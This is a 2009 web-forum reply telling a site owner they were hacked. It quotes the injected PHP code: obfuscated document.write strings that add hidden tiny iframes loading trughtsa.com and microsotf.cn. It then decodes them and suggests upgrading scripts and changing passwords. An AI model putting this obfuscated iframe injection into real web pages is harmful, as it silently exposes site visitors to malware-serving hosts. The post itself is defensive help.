View Single Post
  #2 (permalink)  
Old 07-07-2009, 06:42 PM
txspaderz's Avatar
txspaderz txspaderz is offline
Registered User
 
Join Date: Jun 2008
Location: Houston
Posts: 18
txspaderz is on a distinguished road
Quote:
Originally Posted by mail2sacp View Post
Hi,

I have following code and getting following error on my site.
-------------------
---------------------------------------------------------------
Please let me know how can I fix this as its getting critical now.

Regards
Mail2sacp

You have been hacked:
Code:
<?php echo '<script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-32645524-1");pag
eTracker._trackPageview();} catch(err) {}</script>'; ?><?php echo ''; ?><?php echo ''; ?><?php echo '<script>document.write("<"+"i"+
"f"+"ram"+"e sr"+"c=\"h"+"t"+"tp"+":"+"/"+"/tr"+"ught"+""+"s"+"a.c"+"o"+"m/\" wid"+"th=1 he"+"ight"+"="+"2></if"+"r"+"a"+""+"me>");<
/script>'; ?><?php echo '<script>document.write("<i"+"fr"+"a"+"me s"+"rc=\"h"+"tt"+"p"+":"+"/"+"/tru"+"ght"+""+"sa.c"+"o"+"m"+"/\" w
id"+"th=1 he"+"ight"+"="+"2></i"+"fra"+""+"m"+""+"e>");</script>'; ?><?php echo ''; ?><?php echo '<script>document.write("<if"+''+'r
a'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''
+"f"+"ra"+''+""+''+"me"+'>');</script>'; ?>
That basically says:
Code:
<?php echo '<script>document.write("<i"+
frame src=http//trughtsa.com/\" width=1 height=2></iframe>");<
/script>'; ?><?php echo '<script>document.write("<iframe src="http://trughtsa.com" width=1 height=2></iframe>");</script>'; ?><?php echo ''; ?><?php echo '<script>document.write("<iframe src=http://microsotf.cn/ width=1 height=2></iframe>);</script>'; ?>
I'd recommend upgrading all of your scripts, changing your password, etc etc.
Reply With Quote